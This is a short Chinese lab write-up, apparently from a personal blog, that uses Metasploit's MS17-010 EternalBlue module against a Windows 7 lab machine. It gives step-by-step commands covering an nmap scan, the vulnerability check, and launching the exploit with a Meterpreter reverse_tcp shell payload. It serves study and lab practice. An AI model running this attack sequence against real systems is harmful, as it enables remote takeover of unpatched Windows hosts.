1. 实验目的
利用ms17-010漏洞获得靶机(一个存在漏洞的系统)权限。
2. 实验原理
利用了微软 Microsoft Windows SMB 服务器通信协议。
SMB主要用来使得一个网络上的机器共享计算机文件、打印机、串行端口和通讯等资源。它也提供认证的行程间通讯机能。使用445端口。
攻击者利用445端口发送特殊设计的消息,来远程执行攻击代码。
3. 准备
一台靶机(win7),一台攻击机(kali)
4. 过程
1. 设置扫描ip
先推算ip,设置攻击机和靶机在同一网段。
Kali机设置(有两种方法):
① vim /etc/network/interfaces
更改完后记得重启网卡。
② ip addr add 你的ip地址/24 dev eth0
使用nmap扫描网段内存活的主机:
nmap -sP + 网段
扫描到两台机子,一台是我们的攻击机,133是我们的win7靶机。
2. 使用msf攻击
启动msf:msfconsole
(ps:会出现的图像随机,不影响操作)
查找ms17-010模块:search ms17-010
使用use调用模块测试:use auxiliary/scanner/smb/smb_ms17_010
设置检测对象:set rhosts 192.168.1.133
(刚才扫描出的靶机ip,这里用133做试验)
查看配置信息:show options
可以看到,rhost已经设置成功。
这时候可以运行了,使用run或者exploit。
上面写着’host is likely vulnerable to ms17-010’,表示这台靶机可利用ms17-010漏洞攻击。
现在调用攻击模块:use exploit/windows/smb/ms17_010_eternalblue
后面的操作还是一样设置rhost。不过这次要设置lhost(就是你攻击机的ip地址)和payload。
使用show options查看设置。
set rhost 192.168.1.133
set lhost 192.168.1.24
set payload windows/x64/meterpreter/reverse_tcp
show options
run
成功!
5.参考
http://ourjs.com/detail/59172166f12390061496168f
https://blog.csdn.net/qq_37053007/article/details/88327077
https://blog.csdn.net/qq_36197704/article/details/82458557
https://blog.csdn.net/qq_41880069/article/details/82908293
——————————————————————————————
这里是soya
邮箱:1057851022@qq.com
个人博客地址:https://soyawww.github.io
欢迎各位交流探讨哦!